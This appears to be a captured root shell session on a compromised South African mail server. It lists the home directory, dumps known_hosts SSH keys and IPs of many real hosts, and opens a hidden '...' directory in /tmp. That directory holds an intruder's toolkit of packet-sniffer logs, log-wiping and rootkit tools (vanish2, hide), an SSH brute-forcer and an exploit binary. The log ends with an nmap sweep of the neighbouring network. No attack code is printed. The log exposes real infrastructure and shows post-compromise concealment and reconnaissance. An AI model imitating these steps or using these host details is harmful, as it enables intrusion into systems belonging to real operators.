-rw-r--r-- 1 root root 497631 Oct 2 2003 csav-4.80.7-shared.i386.rpm
-rw------- 1 root root 2270855 May 30 15:04 dead.letter
-rw-r--r-- 1 root root 23200 Jan 21 2004 doc_linux.zip
-rw-r--r-- 1 root root 1473 Mar 12 2004 domainlist
drwx------ 2 root root 272 Feb 8 2003 drakx/
-rw-r--r-- 1 root root 164485 Jun 1 2004 fernando
-rw-r--r-- 1 root root 416 Oct 21 2003 fetchmail.txt
-rw-r--r-- 1 root root 5372411 Jun 15 2004 fsav-wks-4-52-2481.tgz
-rwxr-xr-x 1 1360 users 5336184 Nov 26 2003 fsav-wks-4.52.2481*
-rw-r--r-- 1 root root 46 Apr 9 2003 get
-rw-r--r-- 1 root root 12886 Aug 22 2004 histo.tgz
drwxr-xr-x 2 root root 48 Jul 28 2003 in/
-rwxr-xr-x 1 516 516 18792 Dec 20 2002 install.sh*
-rw-r--r-- 1 1360 users 6247 Nov 26 2003 installation.txt
-rw------- 1 root root 1019 Jun 26 2004 irenecountrylodge.co.za
drwxr-xr-x 5 root root 144 Sep 8 2004 john-1.6/
-rw-r--r-- 1 root root 497341 Jun 18 2004 john-1.6.tar.gz
-rw-r--r-- 1 root root 216846 Oct 15 2004 keep
-rwxr-xr-x 1 root root 1518 Sep 1 2004 mail*
drwxr-xr-x 2 root root 184 Aug 6 2003 maillog/
-rw-r--r-- 1 root root 16195 Sep 10 2004 mailq
-rw-r--r-- 1 root root 68839 Dec 2 2004 mails.lafarge
drwxr-xr-x 2 1360 users 216 Nov 26 2003 manual-pages-html/
drwxr-xr-x 2 1360 users 200 Nov 26 2003 manual-pages-txt/
-rw------- 1 root root 290824 Jun 13 09:58 mbox
-rwxr-xr-x 1 root root 252 Sep 19 2003 mqueue*
-rw-r----- 1 root root 280342788 Dec 9 2004 nestlife.brenda.bak
-rw-r--r-- 1 root root 58943 Mar 26 2003 nfmc.log
-rw-r--r-- 1 root root 169 Dec 20 21:50 password
-rw-rw-r-- 1 516 516 15040 Dec 20 2002 readme.txt
-rw-r--r-- 1 root root 1216 Mar 13 2003 relay
-rw-r--r-- 1 1360 users 25063 Nov 28 2003 release-notes.txt
-rw-r--r-- 1 root root 19699 Sep 1 2004 report
-rw-r--r-- 1 root root 3339 Sep 6 2004 report.dean
-rwxr-xr-x 1 516 516 2393 Dec 20 2002 resend.sh*
-rwxr-xr-x 1 516 516 1659 Dec 20 2002 restore.sh*
-rw-r--r-- 1 root root 13594 Dec 5 2003 rrm
-rw-r--r-- 1 root root 94280 Jun 10 2004 save
-rw-r--r-- 1 root root 10396 Mar 13 2003 sendmail.8.12.security.cr.patch
-rw-r----- 1 root root 628 Sep 15 2003 sendmail.st
-rwxr-xr-x 1 root root 197 Dec 2 2004 test*
drwx------ 2 root root 80 Jun 14 01:20 tmp/
-rw-r--r-- 1 root root 339 Sep 10 2003 todel
drwxr-xr-x 3 root root 72 Sep 4 2004 usr/
drwxr-xr-x 3 root root 72 Aug 22 2004 var/
-rw-r--r-- 1 root root 7572 Sep 14 2003 var.trz
-rw-r--r-- 1 root root 11829 Jun 10 2004 wondershaper-1.0.tar.gz
drwxr-xr-x 2 1000 users 2072 Sep 10 2004 xamime-LINUX/
[root@plet root]# ls
BitDefender-sendmail-1.5.5-2.linux-gcc3x.i586.tar.run*
Creport
Desktop/
Documents/
Mail/
Sreport
XAM-BE-33-29672-LINUX-glibc23-sm11.tar.gz
XAM-BE-33-31609-LINUX-glibc23-sm11.tar.gz
XAM-BE-33-31642-LINUX-glibc22-sm11.tar.gz
XAM-LEVEL3-33-33946-LINUX-glibc23-sm11.tar.gz
XAM-LEVEL3-33-34116-LINUX-glibc23-sm11.tar.gz
aliases.frogav.co.za*
altermime-0.3.6/
altermime-0.3.6.tar.gz
apg-2.2.3/
apg-2.2.3-1mdk.i586.rpm
apg-2.2.3.tar.gz
cleanxmime*
core.13099
core.13184
core.13191
core.18972
csav-4.80.7-shared.i386.rpm
dead.letter
doc_linux.zip
domainlist
drakx/
fernando
fetchmail.txt
fsav-wks-4-52-2481.tgz
fsav-wks-4.52.2481*
get
histo.tgz
in/
install.sh*
installation.txt
irenecountrylodge.co.za
john-1.6/
john-1.6.tar.gz
keep
mail*
maillog/
mailq
mails.lafarge
manual-pages-html/
manual-pages-txt/
mbox
mqueue*
nestlife.brenda.bak
nfmc.log
password
readme.txt
relay
release-notes.txt
report
report.dean
resend.sh*
restore.sh*
rrm
save
sendmail.8.12.security.cr.patch
sendmail.st
test*
tmp/
todel
usr/
var/
var.trz
wondershaper-1.0.tar.gz
xamime-LINUX/
You have new mail in /var/spool/mail/root
[root@plet root]# cd .ssh
[root@plet .ssh]# cat known_hosts
196.15.249.209 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzIEVgzYxi0gw7M8wAmcNVKU3OedR13O+Bwq7EAJr2FznpiLi2xlRA3VMjdzphZCItWIR0gd48haQgYM8km7DSYkeOTnjBrD4VaRKdJf9ifdXPMVsdiKqhps1qYDn3futnYb/EcVOywHc+KqtxqY6gZT0XP8S+MOHfVqRW+ZWUA8=
lin02,196.15.249.201 ssh-dss
AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw==
165.165.107.238 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA2XESYRkpCv/TQJOuR+lxYpCij1p66Yk8goiDFG5apRkQyx0dpOy5E64j+WkPwP/j9znFQg7I0rljyuxOtYwlQy4Lfh2j8zvjcVE/dmV8ohsJXmjDHwoB3oOBuiGyntCivaNaoRzbghi+8DRx0gf2t3mRlD9fnTEl7Ud2z5pxbwU=
155.239.167.164 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziMryJmik3B2/tFadx/se7CBSyu35sYQFCRjPdKbJ7sdrCghvE5I44s4eHhlK11iqig35KetEyVYv1JbAiw2gBxRgmPPjCl7sV+ZJ/6IpbkjmPA4sLHLkF6pg7byTXMTdBm6lHQ22mcd1/FnF9/CglBAaHu3DivAStEX5jQ/b0c=
165.165.138.230 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAuH7AEnMVFlmYgo+gohImyodnKsaJFVr6EOtLP4bbxWpnWvXa2zcJV7dC7njWpVn66kDU7w3JXS8WXjkTuqm5gkUZrbHTCFwSsIZZT+J6Z9SuOAega430ZuZdlVQ3bRAEensLq6B01u0w70GKPgFz7nG2fuEMvjs71w5+4HT6RG8=
lin02.compumail.co.za ssh-dss
AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw==
165.146.63.159 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAuH7AEnMVFlmYgo+gohImyodnKsaJFVr6EOtLP4bbxWpnWvXa2zcJV7dC7njWpVn66kDU7w3JXS8WXjkTuqm5gkUZrbHTCFwSsIZZT+J6Z9SuOAega430ZuZdlVQ3bRAEensLq6B01u0w70GKPgFz7nG2fuEMvjs71w5+4HT6RG8=
155.239.167.203 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziMryJmik3B2/tFadx/se7CBSyu35sYQFCRjPdKbJ7sdrCghvE5I44s4eHhlK11iqig35KetEyVYv1JbAiw2gBxRgmPPjCl7sV+ZJ/6IpbkjmPA4sLHLkF6pg7byTXMTdBm6lHQ22mcd1/FnF9/CglBAaHu3DivAStEX5jQ/b0c=
knysna,196.15.249.203 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzyeC8l1kKcYyG9b+ivtIaWyl9a2uLFbgUNq1h53MrLASfGQNIoFtSolXG0DsXs1qZPewceTRRT3+DNiarmHpoUYRxu3UX4ZqkJR88nbSMOQLq0x/oNULWlTwfm1lDq2eJdRT1UyH1tP/EeBbUiqVplG9xn9ytA2jWZY2JgEO2GU=
localhost 1024 41
104815528740090300232762682062148731692345617648761884893144749702438178716507602106384467348442332555726272229905090060865518152094220166348851874522827117669256069180699567468232805547620203421525417575684002027686936703327559508891840428578000903598085456851354927023314524854708653799840391129004567592229
localhost ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1GGPVqpEtReFznRbCophK4JL0CPfLwJK0CejbXkoYxR+Wfqog3B6c5z405XmHnoQ1Qwdd1zoFaxT9Our5ofqyGRgNas5knuweIHivMZdKGK+WsIS0r5iyWwsr3+J1SXOywOO0fHz27eVlItLSjAblEyzKkYH/V8KNU15MpZPSYs=
lin02.lanlink.co.za ssh-dss
AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw==
196.15.249.204 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1GGPVqpEtReFznRbCophK4JL0CPfLwJK0CejbXkoYxR+Wfqog3B6c5z405XmHnoQ1Qwdd1zoFaxT9Our5ofqyGRgNas5knuweIHivMZdKGK+WsIS0r5iyWwsr3+J1SXOywOO0fHz27eVlItLSjAblEyzKkYH/V8KNU15MpZPSYs=
165.165.202.94 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA2XESYRkpCv/TQJOuR+lxYpCij1p66Yk8goiDFG5apRkQyx0dpOy5E64j+WkPwP/j9znFQg7I0rljyuxOtYwlQy4Lfh2j8zvjcVE/dmV8ohsJXmjDHwoB3oOBuiGyntCivaNaoRzbghi+8DRx0gf2t3mRlD9fnTEl7Ud2z5pxbwU=
165.146.53.0 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA8crY2nm4Am0IqA436GvY4UcxQLVa0LDgtZu+bbXhyV8AwW8qR8ZQi5N2KpRzLwMQ6iIwPRkamg2rl/8FrmId/k38vfRqDNnxLTPDH+Ir36xDseITZjWU0vvkFh68J2jKftQ8v7M33UxdyQGnYD1B3w96YIEpslt1G2RO4nTfNyU=
69.42.77.57 ssh-dss
AAAAB3NzaC1kc3MAAACBAPu/Axyn2e2BmPBn0PN72OJloSk2xAVSvR+pVTI5Q7/W2GmLnYus9tq1qqXziJ1YprvPLZCHYUO8xuVcOBCVc2aInp7nl6Ti0jWMLz6bxYUerH8YRQAFSMDAcfxAjPippPRSsOgGpP412+YUbjiDB8OrI3xYTm5DwOipK1+K3tAHAAAAFQDe9R/Qj+QVlpWB1ch6O4jqUND1yQAAAIBMolOri0TE60UDQHliN4Ubn2Yb8jDpIOftPBWKi0WTKMVqeeH/JmDLgNGjq9OjV0TbWbkEBjnrwFph96+f5QUmDcIns0hQHa2cgQ9yCF7k4/ZTraMItxQ0SOsUV0v9Soe2nIpfhJh8zl38qW2Xn0BBg+YdzBau3WJhLDzck4pWiAAAAIEA4Uizqh111maVE8pB62XPtOHNMX+FTmlvMu+0ezDNa7qW1FysoRlTsYNQC/YQS/5Ly+ktoIcQnt1+bOEVzqtmQdy2q6ZmmWKs9ig40NxojbUTSG5oaVmKoHXsdJYoukTdx0fi36lPwZ876zDuWfQ1qEwh4bnP+8ywr+zToSjU89Q=
knysna.compumail.co.za ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzyeC8l1kKcYyG9b+ivtIaWyl9a2uLFbgUNq1h53MrLASfGQNIoFtSolXG0DsXs1qZPewceTRRT3+DNiarmHpoUYRxu3UX4ZqkJR88nbSMOQLq0x/oNULWlTwfm1lDq2eJdRT1UyH1tP/EeBbUiqVplG9xn9ytA2jWZY2JgEO2GU=
sodwana.compumail.co.za,196.15.249.207 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAnRLlmrqsBVpPKzy+ycibPbk/8Yo146BYtGSmrEuXxyiKFHiQ28qAHOr1DK1LNVqHRNwe0XJcwqF0MWneLDoNRAjElSxEoqGnhXgYXgLhTgjSVyafBjNAQk000tQ/0MIrYmRBQ7JFIMMNQaCcA45LKAlJ5xaAyG75v+KEHS5Vha8=
uvongo,196.15.249.193 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwOyZQMPIn1EdkLP1//ImSO4406UUrW6klYua92ATW3fu5/6ZBIQuIjzxHAwesomdW3SWN7yUGfYUw048kG3hz50TH0HGIYilNEiO2ir0JzD+cDPeGwB0xBkX0JEFqw3Mh5TjByqM2XdSbbX5s9x8KvN9ZwPyP5W7focFis1SqxU=
grimhosting.com,209.59.136.207 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA316wYrE01vNOTi0CxuGDfThzfnJPKdWCs3HVQspofi2qlHxdXXU/UsM98sMUz14MYLQqH7evt4VpY0l2y1VZXAT2hLIrfGlWleZx/xY4MDKFDdD9m9WnvMwx/GO5WNCOuxNf9F7c8pPCU7qUuhL1IYQx1lPE5nsEJis3DDlnt+k=
196.25.45.234 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAr1lRkcyjE/oLNoXeIw/ScHBYycVEXK5XBV3u6J/EONm662V5pLqRYeNq1ONvnJXztyFfvcxUFE0IfUhFX84NXkHr19vJqoht60hl9/Z7xGRj/f0fdMRE1JJIU7AHBpcSu1IlqCceV2qI88imxM1MDGD6f4R7IPCc4AZ5yu/T9NU=
parktonian.no-ip.info,165.165.85.80 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAz1LHpXltGLXL+M4BMdffcoTh460gRQ398M3HVGzQPB670q0Un3VL9mq6f9z5Wu7taONBxgUXMnX782OK95odj0G5H9/vAEO/jvEliqaeUP+9syBFCPHyjzAWOQw+AVD8n5x1gIgLNYlyeY65X4Oq3RCzwcUg4oIi/11TvKILDVM=
192.34.71.51 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzl+gd6A8l1mIe6xABeXzaAJygi0QmCSL1VZboBSk/NnFQxR23tLiUSgPRcVgvar61FfC76IcEeM7t7noESMHN3qnAsnjHbazH5x8epJkHczs+bBObR7aLvTG+/FF0llq4YScGVa/U+VMOYFZRcr47UD/ZkwbXvQI0S9776KAFHM=
208.236.67.2 1024 37
128239661996092802462484923133165440599676388125800690465563291965345544098097414632851814530805241501184097958010013785810757628995111461006238545117388745177411998228478101029758563210814516607167100707354341996649219755156939397397742917097273048832780655761449692253286578799488307974605547010992919492263
196.25.45.246 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1csDK8MRn20spxpnjvCLeQ93XQdTHWcACFzBk2oGM04yH5sPjW+Ia4T0bFf+7BehJh/38gcWGg7N8puZjcVXUPykc7mGT0OsMLukR4sJiQZjbgfDPdnIh5P+OlSrYkyN00pcmrECJ1yO9imbzfUYkknUnpCJPl324W90RGoL3I0=
196.25.45.254 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAsLCjGV6av0CmgvSp98rtyPq0mYm/YVKAhBxKbthtC6yhnbN5WTSdrZhRwuoEoafLoUdbwr/iYfKIrylwnYT96EccphwpwFBO3YiK+fK7LF1/LVizWat+NZJHTjLKmfAvrF51l3lyZR1AEZSziM7p884tIh5UeUktf/TRS8kFz88=
mail.logisticor.com,165.146.7.205 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAvlDoESxTN5fjfML7q0EyCySK8UffrwwNpDgH2RxxNrXWg47hQoqwWHr9TM5czoe4z0Z4QizqfzwqlD4rkFnDbpVI7nx99+WIt2aRKzjOxQzRPpl7b75FDPsYxlV2hdPkSZnVCZBBESfWkhG+5PjCjRdYu/JyjrndFrrOHrBxHis=
196.7.143.167 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAq/thnwCanNbgm1SxPQ1hqA556ZqMmrVbXVXHS7G4Sp1neLUUC5ufGoootqCcJ6JPkNXSZi1mofkDv1bLEnW6mR4Qwo2gEvKZmkaaTYMZuM+Zuaw91R9IB1bYPb2MCdbg+DMKo52JTYdKNsBNk0wvKrF0+4O6AgoV5xBa2IgBOM0=
histologic.no-ip.info,165.146.101.31 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwmaXcYfjdIrrZVxzBHLc0C0nWqBEHX4APDdh0oVz6q6pCjWYcn3EJ4HGYWxdqWKfd3tQ6A7qNpJoL8U8nOtOPSEpfKjfolUYbVdFUcey66RHSS7qzZ/QVt1Fj5CBok2VMLSppqNqIAJPsmiUWF0x6KfAnEqTvSAjwbY/3xLKdMM=
129.7.238.59 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwX6dWLcT3kzxkTrn2yQICAq/ISj6ECjj0KWjAOv/ctcTVRSa648kdhtaNf8B/pEpB/I9M/9OVYbSpSgtn+8KDWUnw+BbiNGwkmROyErAghmFLh+BpbSVNtYk6C/xUZTVR/E4qTMqzFlWXNWoG3yajKZ2DSslCBcIS8iBMeoFnu8=
64.0.82.34 ssh-dss
AAAAB3NzaC1kc3MAAACBALfR2hyuGRXwIO4+JjbcZoh6OBo2LlRjwNW/o+gp/Ur3TrP9yiCs3wpfjYybNZ7PdS8aRjpk6ifKV6Rjhx6QutMG77/kHe19Epx8/vITWNFyumsnGGY1Ndaq5sTsTyfd2yvmVxelwjDVWBIlasQITMxosPlj1zA9oiseP5cqAc33AAAAFQDl18RGZxaSCouKiI6Uf20uLOOmMQAAAIB3XHXXUZOv1g6XGqVzPL8GD7PTO7UHUyvNU1DFD23zz3RZ6gR+dpN7rFBcOeQlNfMkrAeAk8dcQAn6Iyrb7HNIE2exnDx5mLTIlHsFR6q8nn866I/ZX/UY73Wnf1tTsGwfMQbyiv3cEjsIVNlp0OHv6ZHWJonz7mfSRBhPTCkMqwAAAIApLhC1Gfgu54vKQePoN3s7xRnIY5fDSJLejsS5i9J/PCIOitF9ARc4xk29gqZrG379sFmCVmhCzib7dsctz9GdTfxwc2lq9im7xtiqgTe08Qkni7aWDxWpX0U2XLZLp4LLVIYqBt+/+B2cgQ76ItpwyQ92pviD1zpAVOUhUzHDfA==
krack.phracked.com,66.205.242.108 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAw+235jJfRt2cwtXgHalZERdyW7eP/P/fkEALsAeAamScRh5poRcuglyludUx3TbqWUBm5c0eXCcHJuDuzbz75jlB4s55GPO+jakojT+WHC5+NlAfOM2PjBPx2ICRUFz4oiKauviP+GXofPOLhJwk4UWQ3sb7sDL7zgkJyTeNhN8=
165.146.106.34 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwmaXcYfjdIrrZVxzBHLc0C0nWqBEHX4APDdh0oVz6q6pCjWYcn3EJ4HGYWxdqWKfd3tQ6A7qNpJoL8U8nOtOPSEpfKjfolUYbVdFUcey66RHSS7qzZ/QVt1Fj5CBok2VMLSppqNqIAJPsmiUWF0x6KfAnEqTvSAjwbY/3xLKdMM=
64.6.7.234 ssh-dss
AAAAB3NzaC1kc3MAAACBANzvmy1CSPp23Z/uRI6ig71ltdUayUuzaxAdQADrOR1YfkGt2xgJoveS3gXUjVtcBfhtYteBVgM9UDxnw6W5AgMogcrc8YOsidN54oJ8ZjWZhSJ5sf2oSiNUfF8XI8x532KPgQKPjXVfmZ1pqaQYq8530/6EhAgNQVLDVbg1ow4rAAAAFQCSIrvhKkNAtzeZYUtgDoDsA74M4wAAAIEAmxDNlpMpi/ILC1ca8ukU/zPmFk3EstVmljfT2cgeWAffAPnsZfpJ6ivQ19v6DFONq9iX0TAF8S4NXfWKyYeY3TRHj1boPu8eyyrDN5jOPc9DjIyRenemBNGb7JxJUUzMb5aKLJ1+3vuSlSPhyRoez8UXjLtcQID3VF8ULEBfhMgAAACBAIQgV7qMmFwXzPasro4o2bxLGpxLGaIi+XV0pz3l+GOio15GI1mfQnXbbhq0Jip+y+8iW49gfygP6sGiFCfumqv18keo/4/LYPycqEMPVsNJLj937X7PPMx9dG/OdQ7oRpVfx1cqQwUTE71kb7g1Wxrvmbtu6HfjSBLqhYoNxmJu
127.0.0.1 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1GGPVqpEtReFznRbCophK4JL0CPfLwJK0CejbXkoYxR+Wfqog3B6c5z405XmHnoQ1Qwdd1zoFaxT9Our5ofqyGRgNas5knuweIHivMZdKGK+WsIS0r5iyWwsr3+J1SXOywOO0fHz27eVlItLSjAblEyzKkYH/V8KNU15MpZPSYs=
[root@plet .ssh]# uname -a ;id;w
Linux plet.compumail.co.za 2.4.19-16mdksmp #1 SMP Fri Sep 20 16:08:37 CEST 2002 i686
unknown unknown GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
1:29am up 14 days, 17:07, 0 users, load average: 0.21, 0.30, 0.38
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[root@plet .ssh]# cd /tmp/
[root@plet tmp]# ls -la
total 14
drwxrwxrwt 5 root root 360 Jun 14 01:28 ./
drwxr-xr-x 21 root adm 880 May 30 08:20 ../
d--S--S--T 18 root root 1416 Jun 14 01:00 .../
-rw-rw-rw- 1 ratana_g ratana_g 4 Jun 13 15:00 .900.f5a648
drwxrwxrwt 2 xfs xfs 72 Sep 12 2003 .font-unix/
srw------- 1 root root 0 May 22 10:14 .fsav-0=
srw------- 1 root root 0 Jun 14 01:28 .fsav-0-sa=
-rw-r--r-- 1 root root 0 Jun 13 04:10 authfail.log.unsort
-rw-r--r-- 1 root root 0 Jun 13 04:10 denied.log.unsort
-rw-r--r-- 1 root root 554 Jun 14 00:58 ls
-rw-r--r-- 1 root root 0 Jun 13 04:10 sarg.log.unsort
drwx------ 2 root root 80 Feb 27 2003 ssh-XXE002K6/
[root@plet tmp]# cd ...
[root@plet ...]# ls -la
total 159052
d--S--S--T 18 root root 1416 Jun 14 01:00 ./
drwxrwxrwt 5 root root 360 Jun 14 01:30 ../
-rw-r--r-- 1 root root 21788442 Jun 14 01:30 .sniff
-rw-r--r-- 1 root root 121983894 Jan 1 18:25 .sniff.old
-rw-r--r-- 1 root root 6178477 May 20 08:28 .sniff.old2
drwxr-xr-x 12 dlv_bern 1038 1200 Apr 23 20:36 BitchX/
drwxr-sr-x 2 root root 120 Jun 8 04:33 afp/
drwxrwxrwx 8 3232 ntools 928 Jan 14 06:35 cfengine-2.0.7/
-rw-r--r-- 1 root root 1190033 May 15 2003 cfengine-2.0.7.tar.gz
drwxr-sr-x 2 root root 96 Jun 8 18:12 cimap/
drwxr-xr-x 10 1001 wheel 864 Jun 11 15:54 h4ckwebdav/
-rw-r--r-- 1 root root 405818 Jun 11 15:51 h4ckwebdav.tar.gz
-rwx------ 1 root root 12014 Sep 14 2004 hide*
drwxr-sr-x 2 root root 152 Jun 6 17:31 imap/
-rw-r--r-- 1 root root 6550 Apr 23 20:32 index.html
-rw-r--r-- 1 root root 2532476 Mar 27 2004 ircii-pana-1.1-final.tar.gz
-rw-r--r-- 1 root root 1153560 Dec 11 2003 irssi-0.8.9.tar.gz
drwxr-sr-x 5 root root 144 May 12 23:33 john-1.6/
-rw-r--r-- 1 root root 497341 Sep 18 1999 john-1.6.tar.gz
-rw-r--r-- 1 root root 0 Jun 13 05:41 mail.hm
drwxrwxrwx 32 1000 1000 1416 May 28 08:05 mailutils-0.6/
-rw-r--r-- 1 root root 2837017 Dec 23 20:19 mailutils-0.6.tar.gz
drwxrwxrwx 4 500 frog_rud 1824 Jun 8 15:42 nano-1.2.5/
-rw-r--r-- 1 root root 911938 May 16 06:06 nano-1.2.5.tar.gz
-rw-r--r-- 1 root root 1846196 Apr 24 08:58 nmap-3.81.tgz
-rw-r--r-- 1 root root 2105 Dec 11 2004 nmap.log
drwxrwxr-x 7 500 frog_rud 10768 Jun 8 15:56 openssh-3.4p1/
-rw-r--r-- 1 root root 837668 Sep 17 2002 openssh-3.4p1.tar.gz
-rw-r--r-- 1 root root 312224 Jun 24 2004 psyBNC2.3.1.tar.gz
drwxrwxr-x 11 root root 728 Mar 9 08:58 psybnc/
drwxr-sr-x 2 root root 176 May 27 21:41 rlogin/
-rw------- 1 1010 dlv_bern 263 Feb 18 2000 rootkitutil.h
drwxr-xr-x 3 root wheel 216 Jan 2 07:58 shoutcast-1-9-4-linux-glibc6/
-rw-r--r-- 1 root root 152616 Mar 18 2004 shoutcast-1-9-4-linux-glibc6.tar.gz
drwxr-xr-x 2 root root 632 May 11 23:10 shroud-1.30/
-rw-r--r-- 1 root root 9248 Nov 3 2002 shroud-1.30.tgz
-rwxr-xr-x 1 root root 20416 May 13 00:43 sol*
-rw-r--r-- 1 root root 12529 May 13 00:42 sol.c
drwxr-sr-x 2 root root 256 Jun 12 03:37 sshbrute/
-rw-r--r-- 1 root root 2402 Jun 10 06:21 ssheist-1.log
drwxr-sr-x 3 root root 656 May 12 04:03 synscan/
-rw-r--r-- 1 root root 53939 Mar 22 2002 synscan1.6.tar.gz
-rwxr-xr-x 1 root root 19860 May 11 23:13 vanish2*
-rw------- 1 1010 dlv_bern 8525 Feb 18 2000 vanish2.c
-rw-r--r-- 1 root root 3256 Feb 18 2000 vanish2.tgz
[root@plet ...]# cat nmap.log
Host 196.15.249.65 appears to be up.
Host 196.15.249.66 appears to be up.
Host 196.15.249.69 appears to be up.
Host 196.15.249.73 appears to be up.
Host 196.15.249.74 appears to be up.
Host 196.15.249.77 appears to be up.
Host 196.15.249.81 appears to be up.
Host 196.15.249.82 appears to be up.
Host 196.15.249.83 appears to be up.
Host 196.15.249.84 appears to be up.
Host 196.15.249.85 appears to be up.
Host 196.15.249.86 appears to be up.
Host 196.15.249.87 appears to be up.
Host 196.15.249.88 appears to be up.
Host 196.15.249.89 appears to be up.
Host 196.15.249.90 appears to be up.
Host 196.15.249.91 appears to be up.
Host 196.15.249.92 appears to be up.
Host 196.15.249.93 appears to be up.
Host 196.15.249.94 appears to be up.
Host 196.15.249.97 appears to be up.
Host 196.15.249.99 appears to be up.
Host 196.15.249.105 appears to be up.
Host 196.15.249.108 appears to be up.
Host 196.15.249.109 appears to be up.
Host 196.15.249.110 appears to be up.
Host 196.15.249.113 appears to be up.
Host 196.15.249.114 appears to be up.
Host 196.15.249.117 appears to be up.
Host 196.15.249.121 appears to be up.
Host 196.15.249.122 appears to be up.
Host 196.15.249.125 appears to be up.
Host 196.15.249.126 appears to be up.
Host uvongo.compumail.co.za (196.15.249.193) appears to be up.
Host srv1.lanlink.co.za (196.15.249.195) appears to be up.
Host srv1.lanlink.co.za (196.15.249.196) appears to be up.
Host 196.15.249.197 appears to be up.
Host 196.15.249.198 appears to be up.
Host web01.lanlink.co.za (196.15.249.199) appears to be up.
Host lin02.lanlink.co.za (196.15.249.201) appears to be up.
Host knysna.compumail.co.za (196.15.249.203) appears to be up.
Host plet.compumail.co.za (196.15.249.204) appears to be up.
Host website.lanlink.co.za (196.15.249.206) appears to be up.
Host sodwana.compumail.co.za (196.15.249.207) appears to be up.
Host 196.15.249.209 appears to be up.
Host 196.15.249.233 appears to be up.
Host 196.15.249.234 appears to be up.
Host 196.15.249.237 appears to be up.
Host www.atkv.org.za (196.15.249.238) appears to be up.
Host 196.15.249.242 appears to be up.
